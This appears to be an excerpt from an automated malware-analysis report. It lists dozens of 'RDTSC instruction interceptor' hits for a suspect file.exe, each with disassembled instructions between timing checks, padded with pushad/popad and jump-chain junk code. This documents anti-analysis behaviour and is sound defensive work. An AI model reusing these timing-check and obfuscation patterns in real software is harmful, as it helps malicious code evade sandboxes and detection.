              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 795748 second address: 795753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 796915 second address: 796929 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E8FEEEh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 796929 second address: 79692D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79692D second address: 79695C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007FC714E8FEFBh 0x00000010 jmp 00007FC714E8FEF5h 0x00000015 jmp 00007FC714E8FEEAh 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7982EC second address: 798329 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FC714E9842Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jno 00007FC714E98426h 0x00000012 jmp 00007FC714E98430h 0x00000017 pop edx 0x00000018 popad 0x00000019 push edi 0x0000001a push eax 0x0000001b push edx 0x0000001c jg 00007FC714E98426h 0x00000022 jno 00007FC714E98426h 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 798329 second address: 79832D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ACA58 second address: 6ACA5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E5036A second address: 4E5036F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E5036F second address: 4E503E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC714E98434h 0x00000009 sbb ax, 1508h 0x0000000e jmp 00007FC714E9842Bh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FC714E98438h 0x0000001a jmp 00007FC714E98435h 0x0000001f popfd 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 xchg eax, ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov ebx, 1E2EB2AEh 0x0000002c call 00007FC714E9842Fh 0x00000031 pop esi 0x00000032 popad 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E503E4 second address: 4E50443 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 745Bh 0x00000007 call 00007FC714E8FEF0h 0x0000000c pop esi 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 call 00007FC714E8FEEAh 0x0000001a pop eax 0x0000001b popad 0x0000001c pushfd 0x0000001d jmp 00007FC714E8FEEBh 0x00000022 adc cx, BD6Eh 0x00000027 jmp 00007FC714E8FEF9h 0x0000002c popfd 0x0000002d popad 0x0000002e xchg eax, ebp 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E50443 second address: 4E50447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E50447 second address: 4E5045A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E8FEEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E5052D second address: 4E50531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E50531 second address: 4E50537 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E804EC second address: 4E80525 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FC714E98438h 0x00000008 add ah, 00000058h 0x0000000b jmp 00007FC714E9842Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov eax, 65B8470Fh 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d push eax 0x0000001e pop edx 0x0000001f popad 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80525 second address: 4E8052B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8066B second address: 4E8067A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E9842Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8067A second address: 4E806FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E8FEF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b movzx esi, di 0x0000000e pushfd 0x0000000f jmp 00007FC714E8FEF9h 0x00000014 adc cx, 5916h 0x00000019 jmp 00007FC714E8FEF1h 0x0000001e popfd 0x0000001f popad 0x00000020 push eax 0x00000021 jmp 00007FC714E8FEF1h 0x00000026 nop 0x00000027 jmp 00007FC714E8FEEEh 0x0000002c push dword ptr [ebp+08h] 0x0000002f pushad 0x00000030 mov bl, ch 0x00000032 push eax 0x00000033 push edx 0x00000034 movsx edi, cx 0x00000037 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8078B second address: 4E807C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC714E9842Eh 0x00000009 sub si, F918h 0x0000000e jmp 00007FC714E9842Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov eax, esi 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push esi 0x0000001d pop edx 0x0000001e jmp 00007FC714E9842Ah 0x00000023 popad 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E807C3 second address: 4E807C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E807C8 second address: 4E807FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, dx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b jmp 00007FC714E98439h 0x00000010 leave 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC714E9842Dh 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E807FC second address: 4E70039 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E8FEF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d cmp eax, 00000000h 0x00000010 setne al 0x00000013 xor ebx, ebx 0x00000015 test al, 01h 0x00000017 jne 00007FC714E8FEE7h 0x00000019 xor eax, eax 0x0000001b sub esp, 08h 0x0000001e mov dword ptr [esp], 00000000h 0x00000025 mov dword ptr [esp+04h], 00000000h 0x0000002d call 00007FC719839323h 0x00000032 mov edi, edi 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 mov cl, 11h 0x00000039 pushfd 0x0000003a jmp 00007FC714E8FEF9h 0x0000003f sbb ax, 6A76h 0x00000044 jmp 00007FC714E8FEF1h 0x00000049 popfd 0x0000004a popad 0x0000004b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70039 second address: 4E70049 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC714E9842Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70049 second address: 4E7004D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7004D second address: 4E7006B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC714E98433h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7006B second address: 4E70071 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70071 second address: 4E70075 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70075 second address: 4E700BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c mov cx, 332Fh 0x00000010 popad 0x00000011 mov ebp, esp 0x00000013 jmp 00007FC714E8FEF2h 0x00000018 push FFFFFFFEh 0x0000001a jmp 00007FC714E8FEF0h 0x0000001f call 00007FC714E8FEE9h 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 mov bh, FBh 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E700BA second address: 4E70138 instructions: 0x00000000 rdtsc 0x00000002 mov dl, ch 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007FC714E9842Ch 0x0000000f add si, 15E8h 0x00000014 jmp 00007FC714E9842Bh 0x00000019 popfd 0x0000001a mov ebx, esi 0x0000001c popad 0x0000001d mov eax, dword ptr [esp+04h] 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007FC714E9842Bh 0x00000028 or eax, 3F5AE52Eh 0x0000002e jmp 00007FC714E98439h 0x00000033 popfd 0x00000034 push eax 0x00000035 push edx 0x00000036 pushfd 0x00000037 jmp 00007FC714E9842Eh 0x0000003c or ecx, 4A87EAA8h 0x00000042 jmp 00007FC714E9842Bh 0x00000047 popfd 0x00000048 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70138 second address: 4E7016C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 jmp 00007FC714E8FEF4h 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007FC714E8FEECh 0x00000018 mov ecx, 1ED01011h 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7016C second address: 4E701F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 36h 0x00000005 mov al, 08h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c mov eax, edi 0x0000000e push ebx 0x0000000f movzx eax, dx 0x00000012 pop ebx 0x00000013 popad 0x00000014 push 2B56407Fh 0x00000019 jmp 00007FC714E98437h 0x0000001e add dword ptr [esp], 4A52EAF1h 0x00000025 jmp 00007FC714E98436h 0x0000002a mov eax, dword ptr fs:[00000000h] 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007FC714E98439h 0x00000039 adc ecx, 0C3D1446h 0x0000003f jmp 00007FC714E98431h 0x00000044 popfd 0x00000045 popad 0x00000046 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E701F5 second address: 4E70271 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E8FEF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b push eax 0x0000000c pushfd 0x0000000d jmp 00007FC714E8FEF3h 0x00000012 or eax, 72A5902Eh 0x00000018 jmp 00007FC714E8FEF9h 0x0000001d popfd 0x0000001e pop eax 0x0000001f mov bh, D2h 0x00000021 popad 0x00000022 push eax 0x00000023 jmp 00007FC714E8FEF3h 0x00000028 nop 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FC714E8FEF5h 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70271 second address: 4E70277 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70277 second address: 4E70318 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 18h 0x0000000b jmp 00007FC714E8FEEFh 0x00000010 xchg eax, ebx 0x00000011 jmp 00007FC714E8FEF6h 0x00000016 push eax 0x00000017 pushad 0x00000018 mov cx, dx 0x0000001b mov dl, 0Fh 0x0000001d popad 0x0000001e xchg eax, ebx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FC714E8FEF2h 0x00000026 add si, 4FF8h 0x0000002b jmp 00007FC714E8FEEBh 0x00000030 popfd 0x00000031 mov edi, ecx 0x00000033 popad 0x00000034 xchg eax, esi 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 pushfd 0x00000039 jmp 00007FC714E8FEF7h 0x0000003e sub ecx, 7C29706Eh 0x00000044 jmp 00007FC714E8FEF9h 0x00000049 popfd 0x0000004a push ecx 0x0000004b pop edi 0x0000004c popad 0x0000004d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70435 second address: 4E7043B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7043B second address: 4E70460 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FC714E8FEF3h 0x0000000e nop 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov ecx, edx 0x00000014 push edx 0x00000015 pop eax 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70460 second address: 4E70540 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC714E98436h 0x00000009 or esi, 77B463A8h 0x0000000f jmp 00007FC714E9842Bh 0x00000014 popfd 0x00000015 jmp 00007FC714E98438h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d lea eax, dword ptr [ebp-10h] 0x00000020 pushad 0x00000021 mov eax, 4579D6DDh 0x00000026 pushad 0x00000027 movzx esi, di 0x0000002a pushfd 0x0000002b jmp 00007FC714E98435h 0x00000030 or eax, 6CF18926h 0x00000036 jmp 00007FC714E98431h 0x0000003b popfd 0x0000003c popad 0x0000003d popad 0x0000003e mov dword ptr fs:[00000000h], eax 0x00000044 jmp 00007FC714E9842Eh 0x00000049 mov dword ptr [ebp-18h], esp 0x0000004c jmp 00007FC714E98430h 0x00000051 mov eax, dword ptr fs:[00000018h] 0x00000057 pushad 0x00000058 call 00007FC714E9842Eh 0x0000005d pop edx 0x0000005e mov cl, 39h 0x00000060 popad 0x00000061 mov ecx, dword ptr [eax+00000FDCh] 0x00000067 push eax 0x00000068 push edx 0x00000069 jmp 00007FC714E98434h 0x0000006e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70540 second address: 4E70546 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70546 second address: 4E7054A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7054A second address: 4E705A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test ecx, ecx 0x0000000a jmp 00007FC714E8FEF9h 0x0000000f jns 00007FC714E8FEFFh 0x00000015 jmp 00007FC714E8FEEEh 0x0000001a add eax, ecx 0x0000001c pushad 0x0000001d mov al, 5Dh 0x0000001f mov ebx, 1BCD912Eh 0x00000024 popad 0x00000025 mov ecx, dword ptr [ebp+08h] 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FC714E8FEF0h 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E705A1 second address: 4E705A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E603A1 second address: 4E603D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E8FEEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FC714E8FEF6h 0x0000000f push eax 0x00000010 jmp 00007FC714E8FEEBh 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 mov bh, ch 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E603D9 second address: 4E6045D instructions: 0x00000000 rdtsc 0x00000002 mov dx, EA02h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushfd 0x00000009 jmp 00007FC714E98433h 0x0000000e sub ch, FFFFFFFEh 0x00000011 jmp 00007FC714E98439h 0x00000016 popfd 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a jmp 00007FC714E9842Eh 0x0000001f sub esp, 2Ch 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 push edi 0x00000026 pop eax 0x00000027 pushfd 0x00000028 jmp 00007FC714E98439h 0x0000002d or ax, E096h 0x00000032 jmp 00007FC714E98431h 0x00000037 popfd 0x00000038 popad 0x00000039 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6045D second address: 4E60463 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60463 second address: 4E6049D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E98433h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007FC714E98436h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 movzx eax, di 0x0000001a popad 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6049D second address: 4E604D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, cx 0x00000006 mov ecx, 402D2A1Dh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebx 0x0000000f jmp 00007FC714E8FEF8h 0x00000014 xchg eax, edi 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FC714E8FEEAh 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E604D3 second address: 4E604D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E604D7 second address: 4E604DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E604DD second address: 4E604EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC714E9842Dh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E604EE second address: 4E604F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E604F2 second address: 4E6056D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FC714E9842Ah 0x00000010 adc eax, 0BEBDA38h 0x00000016 jmp 00007FC714E9842Bh 0x0000001b popfd 0x0000001c call 00007FC714E98438h 0x00000021 call 00007FC714E98432h 0x00000026 pop esi 0x00000027 pop ebx 0x00000028 popad 0x00000029 xchg eax, edi 0x0000002a pushad 0x0000002b pushad 0x0000002c jmp 00007FC714E9842Ah 0x00000031 call 00007FC714E98432h 0x00000036 pop eax 0x00000037 popad 0x00000038 push eax 0x00000039 push edx 0x0000003a mov di, ECD4h 0x0000003e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6058F second address: 4E605A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E8FEF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E605A4 second address: 4E605B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC714E9842Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E605B4 second address: 4E605B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E605B8 second address: 4E605CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E605CB second address: 4E605CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E605CF second address: 4E605D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E605D3 second address: 4E605D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E605D9 second address: 4E60619 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC714E9842Eh 0x00000009 or cx, BD48h 0x0000000e jmp 00007FC714E9842Bh 0x00000013 popfd 0x00000014 mov bh, ah 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov edi, 00000000h 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 jmp 00007FC714E9842Dh 0x00000026 push esi 0x00000027 pop edx 0x00000028 popad 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60619 second address: 4E6067E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 75F8783Eh 0x00000008 pushfd 0x00000009 jmp 00007FC714E8FEEFh 0x0000000e or ecx, 04516CEEh 0x00000014 jmp 00007FC714E8FEF9h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d inc ebx 0x0000001e jmp 00007FC714E8FEEEh 0x00000023 test al, al 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FC714E8FEF7h 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6067E second address: 4E60684 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60684 second address: 4E60688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60688 second address: 4E6069C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FC714E98666h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6069C second address: 4E606A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E606A2 second address: 4E60712 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, D5A4h 0x00000007 call 00007FC714E9842Dh 0x0000000c pop eax 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 lea ecx, dword ptr [ebp-14h] 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FC714E9842Dh 0x0000001a jmp 00007FC714E9842Bh 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007FC714E98438h 0x00000026 and ecx, 2CCCF6B8h 0x0000002c jmp 00007FC714E9842Bh 0x00000031 popfd 0x00000032 popad 0x00000033 mov dword ptr [ebp-14h], edi 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 mov dh, 4Ah 0x0000003b mov eax, 1A6D1083h 0x00000040 popad 0x00000041 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6073E second address: 4E60744 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60744 second address: 4E6074A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6074A second address: 4E6074E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6074E second address: 4E6078C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007FC714E98434h 0x0000000e push eax 0x0000000f jmp 00007FC714E9842Bh 0x00000014 nop 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FC714E98430h 0x0000001e rdtsc
